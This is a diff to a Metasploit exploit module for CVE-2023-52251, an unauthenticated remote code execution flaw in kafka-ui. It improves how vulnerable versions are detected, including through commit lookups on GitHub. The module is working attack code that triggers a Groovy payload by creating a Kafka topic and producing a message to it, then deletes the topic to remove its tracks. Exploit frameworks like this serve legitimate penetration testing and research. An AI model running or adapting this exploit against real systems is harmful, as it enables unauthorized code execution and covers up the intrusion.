Second release of module

modules/exploits/linux/http/kafka_ui_unauth_rce_cve_2023_52251.rb

@@ -76,17 +76,55 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def vuln_version?
+    @version = ''
     res = send_request_cgi({
       'method' => 'GET',
       'ctype' => 'application/json',
-      'uri' => normalize_uri(target_uri.path, 'api', 'info')
+      'uri' => normalize_uri(target_uri.path, 'actuator', 'info')
     })
-    if res && res.code == 200 && res.body.include?('build')
+    if res && res.code == 200 && (res.body.include?('build') || res.body.include?('git'))
       res_json = res.get_json_document
       unless res_json.blank?
-        @version = res_json['build']['version'].delete_prefix('v') # remove v from vx.x.x
+        if res.body.include?('build')
+          @version = res_json['build']['version'].delete_prefix('v') # remove v from vx.x.x
+        elsif res.body.include?('git')
+          # determine version by using git commit id by querying api.github.com/repos/provectus/kafka-ui/tags.
+          git_commit_id = res_json['git']['commit']['id']
+          # git commit id 38c4cf7 is for whatever reason not listed when quering api.github.com, so we handle this manually
+          if git_commit_id == '38c4cf7'
+            @version = '0.3.3'
+          else
+            # !!! overwriting datastore options is not neat, but I frankly do not know how to do this nicely.
+            # !!! suggestions are welcome ;-)
+            rhost = datastore['RHOSTS']
+            rport = datastore['RPORT']
+            ssl = datastore['SSL']
+            datastore['RHOSTS'] = 'api.github.com'
+            datastore['RPORT'] = 443
+            datastore['SSL'] = true
+            res = send_request_cgi({
+              'method' => 'GET',
+              'ctype' => 'application/json',
+              'uri' => normalize_uri(target_uri.path, 'repos', 'provectus', 'kafka-ui', 'tags')
+            })
+            datastore['RHOSTS'] = rhost
+            datastore['RPORT'] = rport
+            datastore['SSL'] = ssl
+            if res && res.code == 200
+              res_json = res.get_json_document
+              unless res_json.blank?
+                # loop thru the list of commits and return the version based a match on the first 7 chars of the sha commit else return nil
+                res_json.each do |tag|
+                  if tag['commit']['sha'][0, 7] == git_commit_id
+                    @version = tag['name'].delete_prefix('v')
+                    break
+                  end
+                end
+              end
+            end
+          end
+        end
       end
-
       return Rex::Version.new(@version) <= Rex::Version.new('0.7.1') && Rex::Version.new(@version) >= Rex::Version.new('0.4.0') if @version.match(/\d\.\d\.\d/)
     end
     false
@@ -117,6 +155,7 @@ class MetasploitModule < Msf::Exploit::Remote
     post_data = {
       name: topic_name.to_s,
       partitions: 1,
+      replicationFactor: 1,
       configs:
         {
           'cleanup.policy': 'delete',
@@ -192,24 +231,31 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def check
     print_status("Checking if #{peer} can be exploited.")
-    return CheckCode::Vulnerable("Kafka-ui version: #{@version}") if vuln_version?
+    return CheckCode::Appears("Kafka-ui version: #{@version}") if vuln_version?
 
+    unless @version.blank?
+      if @version.match(/\d\.\d\.\d/)
+        return CheckCode::Safe("Kafka-ui version: #{@version}")
+      else
+        return CheckCode::Detected("Kafka-ui unknown version: #{@version}")
+      end
+    end
     CheckCode::Safe
   end
 
   def exploit
     print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
-    print_status('Searching for active Kafka cluster...')
+    vprint_status('Searching for active Kafka cluster...')
     @cluster = get_cluster
     fail_with(Failure::NotFound, 'Could not find or connect to an active Kafka cluster.') if @cluster.nil?
-    print_good("Active Kafka cluster found: #{@cluster}")
+    vprint_good("Active Kafka cluster found: #{@cluster}")
 
-    print_status('Creating a new topic...')
+    vprint_status('Creating a new topic...')
     @new_topic = create_topic(@cluster)
     fail_with(Failure::Unknown, 'Could not create a new topic.') if @new_topic.nil?
-    print_good("New topic created: #{@new_topic}")
+    vprint_good("New topic created: #{@new_topic}")
 
-    print_status('Trigger Groovy script payload execution by creating a message...')
+    vprint_status('Trigger Groovy script payload execution by creating a message...')
     fail_with(Failure::PayloadFailed, 'Could not trigger the Groovy script payload execution.') unless produce_message(@cluster, @new_topic)
 
     case target['Type']
@@ -222,11 +268,11 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     # cleaning up the mess and remove new created topic
-    print_status('Removing tracks...')
+    vprint_status('Removing tracks...')
     if delete_topic(@cluster, @new_topic)
-      print_good("Successfully deleted topic #{@new_topic}.")
+      vprint_good("Successfully deleted topic #{@new_topic}.")
     else
-      print_error("Could not delete topic #{@new_topic}. Manually cleaning required.")
+      vprint_error("Could not delete topic #{@new_topic}. Manually cleaning required.")
     end
   end
 end